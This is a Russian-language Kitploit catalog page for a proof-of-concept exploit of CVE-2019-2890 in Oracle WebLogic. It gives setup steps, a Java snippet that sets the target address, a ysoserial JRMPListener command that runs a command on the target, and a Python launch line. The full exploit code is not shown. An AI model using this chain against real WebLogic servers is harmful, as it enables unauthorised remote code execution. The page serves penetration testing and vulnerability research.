Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2019-2890 — PoC-эксплойт для CVE-2019-2890, нацеленный на Oracle WebLogic, использующий полезную нагрузку ysoserial JRMP для удалённого выполнения команд через десериализацию сериализованных объектов. | Kitploit
Инструменты/GitHubGitHub/l1nk3rlin/cve-2019-2890
Генерация полезной нагрузкиАнализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийКомандование и УправлениеИнструмент Удаленного Доступа
GitHubl1nk3rlin/cve-2019-2890

CVE-2019-2890

PoC-эксплойт для CVE-2019-2890, нацеленный на Oracle WebLogic, использующий полезную нагрузку ysoserial JRMP для удалённого выполнения команд через десериализацию сериализованных объектов.

Репозиторий
852246 лет назадПроверено Kitploit

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

Отказ от ответственности

Только для обучения и обмена опытом. За иное использование ответственность несёте вы сами.

Пояснение

Все необходимые jar-файлы уже импортированы в проект, а в качестве метода эксплуатации используется JRMP из yso. При изучении и отладке способ эксплуатации можно изменить.

Сначала поместите файл SerializedSystemIni.dat из каталога weblogic в папку security.

Затем переименуйте yso в ysoserial.jar и импортируйте его в каталог lib.

1

Далее укажите IP-адрес и порт в методе getObject в файле weblogic/wsee/jaxws/persistence/PersistentContext.java.

root@kitploit:~
        try {
            var3.writeObject(Poc.getObject("127.0.0.1:8000"));
        } catch (Exception e) {
            e.printStackTrace();
        }

Наконец, удалённо прослушивайте через JRMP и выполняйте команду с использованием 7u21.

root@kitploit:~
java -cp ysoserial.jar ysoserial.exploit.JRMPListener 8000 Jdk7u21 "calc.exe"

Порядок использования: запустите Poc.java для генерации сериализованного файла poc.ser, затем выполните:

root@kitploit:~
python weblogic.py ip port poc.ser

1

1

Скачать инструмент